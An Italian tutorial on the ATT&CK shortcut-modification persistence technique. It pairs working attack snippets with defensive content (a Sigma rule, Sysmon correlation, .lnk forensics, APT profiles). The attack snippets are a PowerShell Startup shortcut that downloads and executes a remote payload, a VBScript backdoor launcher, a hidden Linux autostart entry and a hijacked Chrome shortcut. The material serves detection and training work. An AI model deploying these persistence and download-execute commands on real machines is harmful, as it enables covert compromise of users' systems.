Modifica di Shortcut: Boot or Logon Autostart Execution: Shortcut Modification (T1547.009)

Per comprendere questa tecnica, iniziamo creando un shortcut malevolo in Windows. Il comando PowerShell seguente genera un .lnk che esegue il nostro payload:

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\legitimate.lnk")
$Shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
$Shortcut.Arguments = "/c powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.1/payload.ps1')"
$Shortcut.Save()

Questo approccio rispecchia le tecniche usate da Lazarus Group, che mantiene persistenza creando shortcut nella cartella Startup dell'utente. La bellezza di questa tecnica sta nel mascheramento: possiamo modificare l'icona del shortcut per farlo apparire come un'applicazione legittima.

Un metodo alternativo sfrutta VBScript per maggiore compatibilità:

echo Set oWS = WScript.CreateObject("WScript.Shell") > CreateShortcut.vbs
echo sLinkFile = "%USERPROFILE%\Start Menu\Programs\Startup\msupdate.lnk" >> CreateShortcut.vbs
echo Set oLink = oWS.CreateShortcut(sLinkFile) >> CreateShortcut.vbs
echo oLink.TargetPath = "C:\Temp\backdoor.exe" >> CreateShortcut.vbs
echo oLink.Save >> CreateShortcut.vbs
cscript CreateShortcut.vbs

Per testare su Linux, possiamo creare shortcut desktop malevoli che si attivano all'avvio della sessione grafica. Il file .desktop va posizionato in ~/.config/autostart/:

echo "[Desktop Entry]" > ~/.config/autostart/system-update.desktop
echo "Type=Application" >> ~/.config/autostart/system-update.desktop
echo "Exec=/tmp/backdoor.sh" >> ~/.config/autostart/system-update.desktop
echo "Hidden=true" >> ~/.config/autostart/system-update.desktop
echo "NoDisplay=true" >> ~/.config/autostart/system-update.desktop

Un approccio più sofisticato prevede la modifica di shortcut esistenti. APT39 eccelle in questa tecnica, alterando i target path di applicazioni legittime. In laboratorio, possiamo replicare modificando un shortcut di Chrome per eseguire prima il nostro payload:

$shortcut = (New-Object -COM WScript.Shell).CreateShortcut("C:\Users\Public\Desktop\Chrome.lnk")
$originalTarget = $shortcut.TargetPath
$shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
$shortcut.Arguments = "/c start C:\malware\logger.exe & start $originalTarget"
$shortcut.Save()

La detection efficace richiede il monitoraggio di eventi Sysmon specifici. L'EventID 11 cattura la creazione di file, mentre dobbiamo filtrare per estensione .lnk nelle directory sensibili.

Una regola Sigma efficace monitora la creazione di shortcut in posizioni critiche:

title: Suspicious LNK Creation in Startup Folders
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 11
    TargetFilename|contains:
      - '\Start Menu\Programs\Startup\'
      - '\Microsoft\Windows\Start Menu\Programs\Startup\'
    TargetFilename|endswith: '.lnk'
  filter:
    Image|contains:
      - 'msiexec.exe'
      - 'setup.exe'
  condition: selection and not filter

Il vero valore aggiunto sta nel correlate la creazione del shortcut con l'esecuzione successiva. Monitorate processi che partono da explorer.exe con command line sospette entro 5 minuti dalla creazione del .lnk. Questo pattern identifica l'attivazione di shortcut malevoli.

Per ridurre i falsi positivi, create una baseline delle modifiche legittime. Software come Office o browser aggiornano regolarmente i propri shortcut. Documentate questi pattern per escluderli dalle analisi. L'analisi del campo TargetPath rivela molto: percorsi che puntano a %TEMP%, %APPDATA% o contengono encoded strings sono altamente sospetti.

Un approccio comportamentale monitora modifiche massive di shortcut. Gorgon Group spesso modifica multipli .lnk in sequenza rapida. Alert su più di 3 modifiche in 60 secondi dallo stesso processo indicano attività malevola.

L'analisi forense dei shortcut modificati inizia dall'esaminare il file .lnk stesso. La struttura binaria contiene timestamp preziosi e il target path originale. Utilizzate strumenti come LECmd per parsing dettagliato:

LECmd.exe -f "C:\suspicious.lnk" --csv C:\output

I timestamp MAC (Modified, Accessed, Created) del file .lnk forniscono indicazioni temporali precise. Confrontateli con i log di autenticazione per identificare quale utente era attivo durante la modifica.

Nel registro di Windows, la chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist traccia l'esecuzione di shortcut. I valori ROT13-encoded rivelano quante volte un .lnk è stato lanciato e quando. Decodificate questi valori per ricostruire il pattern di utilizzo.

InvisiMole lascia tracce distintive modificando shortcut del Control Panel. Cercate anomalie nei percorsi standard come %APPDATA%\Microsoft\Windows\Start Menu\Programs\System Tools\. La presenza di parametri command line complessi in shortcut che normalmente non ne hanno è un forte indicatore.

Per Linux, esaminate i file .desktop in ~/.config/autostart/ e confrontate i timestamp con /var/log/auth.log per correlare con sessioni SSH o login locali. La presenza di campi Hidden=true o NoDisplay=true suggerisce intenti malevoli.

L'analisi della catena di infezione spesso rivela che il shortcut malevolo è stato creato da un dropper iniziale. Cercate nel filesystem tracce di script VBS o PowerShell con timestamp vicini alla creazione del .lnk. FELIXROOT tipicamente lascia residui di script nella cartella %TEMP% dell'utente.

Lazarus Group utilizza shortcut modification come tecnica signature nelle loro campagne. Il gruppo nordcoreano preferisce .lnk che puntano a DLL malevole caricate attraverso rundll32.exe, spesso mascherandole come aggiornamenti di sicurezza. La loro evoluzione mostra un passaggio da nomi ovvi come "WindowsUpdate.lnk" a denominazioni più sofisticate che imitano software enterprise.

Leviathan, attivo nel Sud-Est asiatico, combina JavaScript con shortcut modification. I loro .lnk tipicamente eseguono wscript.exe con parametri che caricano backdoor JavaScript. Questa combinazione permette maggiore flessibilità nel payload finale e complica l'analisi statica.

Gorgon Group dimostra un approccio ibrido: creano simultaneamente shortcut malevoli e chiavi Run nel registro. Questa ridondanza assicura persistenza anche se una tecnica viene scoperta. I loro target in Medio Oriente suggeriscono che continueranno a raffinare questa metodologia per campagne di spionaggio a lungo termine.

APT39, con focus sull'infrastruttura delle telecomunicazioni, modifica shortcut esistenti piuttosto che crearne di nuovi. Questo approccio più sottile riduce la probabilità di detection. Aspettatevi che evolvano verso la modifica di shortcut di applicazioni cloud e collaboration tools, seguendo il trend del lavoro remoto.

L'analisi dei 25 software che implementano questa tecnica rivela pattern comuni: il 60% usa VBScript per la creazione, il 30% PowerShell, e il 10% API native Windows. Tools come Empire offrono moduli pronti per shortcut modification, abbassando la barriera tecnica per attori meno sofisticati.

Framework MITRE ATT&CK T1547.009 documenta dettagliatamente questa tecnica con esempi di gruppi APT e malware. Le campagne analizzate includono attività di Lazarus Group, APT39, e l'uso diffuso in famiglie malware come InvisiMole e FELIXROOT. Risorse aggiuntive per detection includono Sigma rules repository e LOLBAS project per tecniche di living-off-the-land correlate.